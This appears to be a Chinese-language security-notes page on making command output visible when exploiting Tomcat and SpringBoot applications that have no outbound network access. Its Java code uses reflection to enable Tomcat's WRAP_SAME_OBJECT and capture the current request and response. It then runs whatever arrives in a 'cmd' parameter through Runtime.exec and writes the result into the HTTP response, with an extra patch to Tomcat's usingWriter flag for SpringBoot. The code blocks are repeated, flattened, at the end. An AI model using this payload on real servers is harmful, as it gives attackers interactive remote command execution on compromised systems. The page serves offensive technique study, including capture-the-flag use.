SpringBoot Under Tomcat

适用条件：不出网，无法外带数据，需要将命令或代码执行结果显示出来。

Tomcat下有个类org.apache.catalina.core.ApplicationFilterChain，这个类存放着过滤器链ApplicationFilterConfig[]

/*
Implementation of javax.servlet.FilterChain used to manage the execution of a set of filters for a particular request. When the set of defined filters has all been executed, the next call to doFilter() will execute the servlet's service() method itself.
*/
public final class ApplicationFilterChain implements FilterChain {
    private static final ThreadLocal<ServletRequest> lastServicedRequest;
    private static final ThreadLocal<ServletResponse> lastServicedResponse;

    static {
        if (ApplicationDispatcher.WRAP_SAME_OBJECT) {
            lastServicedRequest = new ThreadLocal<>();
            lastServicedResponse = new ThreadLocal<>();
        } else {
            lastServicedRequest = null;
            lastServicedResponse = null;
        }
    }
}

类初始化时若开启了WRAP_SAME_OBJECT，会设置一个线程本地变量来存储ServletRequest和ServletResponse的变量副本。

默认WRAP_SAME_OBJECT是关闭的，需要设置系统属性org.apache.catalina.core.ApplicationDispatcher.WRAP_SAME_OBJECT或org.apache.catalina.STRICT_SERVLET_COMPLIANCE为true来开启。

这个类下internalDoFilter经过一系列过滤器的doFilter调用后，最后调用servlet的service方法。而切换到servlet需要把ServletRequest和ServletResponse传给servlet，最后servlet会把返回信息写入ServletResponse

若这里开启了WRAP_SAME_OBJECT，相当于做了一个全局的ServletRequest和ServletResponse备份，我们就可以在执行Servlet的service方法时拿到这两个对象了。前者可以获取命令参数，后者可以写入命令执行的结果。

因此我们通过反射修改WRAP_SAME_OBJECT为true，由于这个字段被final修饰，需要修改其访问修饰符。

try {
    Field WRAP_SAME_OBJECT = Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT");
    Field lastServicedRequest = ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
    Field lastServicedResponse = ApplicationFilterChain.class.getDeclaredField("lastServicedResponse");

    Field modifiers = Field.class.getDeclaredField("modifiers");
    modifiers.setAccessible(true);
    modifiers.setInt(WRAP_SAME_OBJECT, WRAP_SAME_OBJECT.getModifiers() & ~Modifier.FINAL);
    modifiers.setInt(lastServicedRequest, lastServicedRequest.getModifiers() & ~Modifier.FINAL);
    modifiers.setInt(lastServicedResponse, lastServicedResponse.getModifiers() & ~Modifier.FINAL);

    WRAP_SAME_OBJECT.setAccessible(true);
    lastServicedRequest.setAccessible(true);
    lastServicedResponse.setAccessible(true);

    boolean on = WRAP_SAME_OBJECT.getBoolean(null);

    if (!on || lastServicedRequest.get(null) == null || lastServicedResponse.get(null) == null) {
        lastServicedRequest.set(null, new ThreadLocal<ServletRequest>());
        lastServicedResponse.set(null, new ThreadLocal<ServletResponse>());
        WRAP_SAME_OBJECT.set(null, true);
    } else {
        ThreadLocal<ServletResponse> response = (ThreadLocal<ServletResponse>) lastServicedResponse.get(null);
        ThreadLocal<ServletRequest> request = (ThreadLocal<ServletRequest>) lastServicedRequest.get(null);

        String cmd = request.get().getParameter("cmd");
        if (cmd != null) {
            ServletResponse servletResponse = response.get();
            Writer writer = servletResponse.getWriter();
            InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
            ByteArrayOutputStream baos = new ByteArrayOutputStream();
            byte[] b = new byte[1024];
            int a = -1;
            while ((a = inputStream.read(b)) != -1) {
                baos.write(b, 0, a);
            }
            writer.write(new String(baos.toByteArray()));
            writer.flush();
        }
    }
} catch (Exception e) {
    e.printStackTrace();
}

需要执行两次，第一次开启WRAP_SAME_OBJECT，给lastServicedRequest和lastServicedResponse初始化。第二次才真正执行命令并返回。

在SpringBoot下，上面的代码会报错

原因在org.apache.catalina.connector.Response#getOutputStream

这里usingWriter为true，而在我们代码中往response写数据时，通过ServletResponse.getWriter().write()写入

getWriter设置了usingWriter为true

因此我们在getWriter()操作后，用反射修改usingWriter为false即可

Field f = servletResponse.getClass().getDeclaredField("response");
f.setAccessible(true);
Response res = (Response) f.get(servletResponse);
Field usingWriter = res.getClass().getDeclaredField("usingWriter");
usingWriter.setAccessible(true);
usingWriter.setBoolean(res, false);

PreviousEcho Tech NextCTF 🚩

Last updated 1 year ago

Was this helpful?

/* Implementation of javax.servlet.FilterChain used to manage the execution of a set of filters for a particular request. When the set of defined filters has all been executed, the next call to doFilter() will execute the servlet's service() method itself. */ public final class ApplicationFilterChain implements FilterChain { private static final ThreadLocal<ServletRequest> lastServicedRequest; private static final ThreadLocal<ServletResponse> lastServicedResponse; static { if (ApplicationDispatcher.WRAP_SAME_OBJECT) { lastServicedRequest = new ThreadLocal<>(); lastServicedResponse = new ThreadLocal<>(); } else { lastServicedRequest = null; lastServicedResponse = null; } } }

try { Field WRAP_SAME_OBJECT = Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT"); Field lastServicedRequest = ApplicationFilterChain.class.getDeclaredField("lastServicedRequest"); Field lastServicedResponse = ApplicationFilterChain.class.getDeclaredField("lastServicedResponse"); Field modifiers = Field.class.getDeclaredField("modifiers"); modifiers.setAccessible(true); modifiers.setInt(WRAP_SAME_OBJECT, WRAP_SAME_OBJECT.getModifiers() & ~Modifier.FINAL); modifiers.setInt(lastServicedRequest, lastServicedRequest.getModifiers() & ~Modifier.FINAL); modifiers.setInt(lastServicedResponse, lastServicedResponse.getModifiers() & ~Modifier.FINAL); WRAP_SAME_OBJECT.setAccessible(true); lastServicedRequest.setAccessible(true); lastServicedResponse.setAccessible(true); boolean on = WRAP_SAME_OBJECT.getBoolean(null); if (!on || lastServicedRequest.get(null) == null || lastServicedResponse.get(null) == null) { lastServicedRequest.set(null, new ThreadLocal<ServletRequest>()); lastServicedResponse.set(null, new ThreadLocal<ServletResponse>()); WRAP_SAME_OBJECT.set(null, true); } else { ThreadLocal<ServletResponse> response = (ThreadLocal<ServletResponse>) lastServicedResponse.get(null); ThreadLocal<ServletRequest> request = (ThreadLocal<ServletRequest>) lastServicedRequest.get(null); String cmd = request.get().getParameter("cmd"); if (cmd != null) { ServletResponse servletResponse = response.get(); Writer writer = servletResponse.getWriter(); InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream(); ByteArrayOutputStream baos = new ByteArrayOutputStream(); byte[] b = new byte[1024]; int a = -1; while ((a = inputStream.read(b)) != -1) { baos.write(b, 0, a); } writer.write(new String(baos.toByteArray())); writer.flush(); } } } catch (Exception e) { e.printStackTrace(); }

Field f = servletResponse.getClass().getDeclaredField("response"); f.setAccessible(true); Response res = (Response) f.get(servletResponse); Field usingWriter = res.getClass().getDeclaredField("usingWriter"); usingWriter.setAccessible(true); usingWriter.setBoolean(res, false);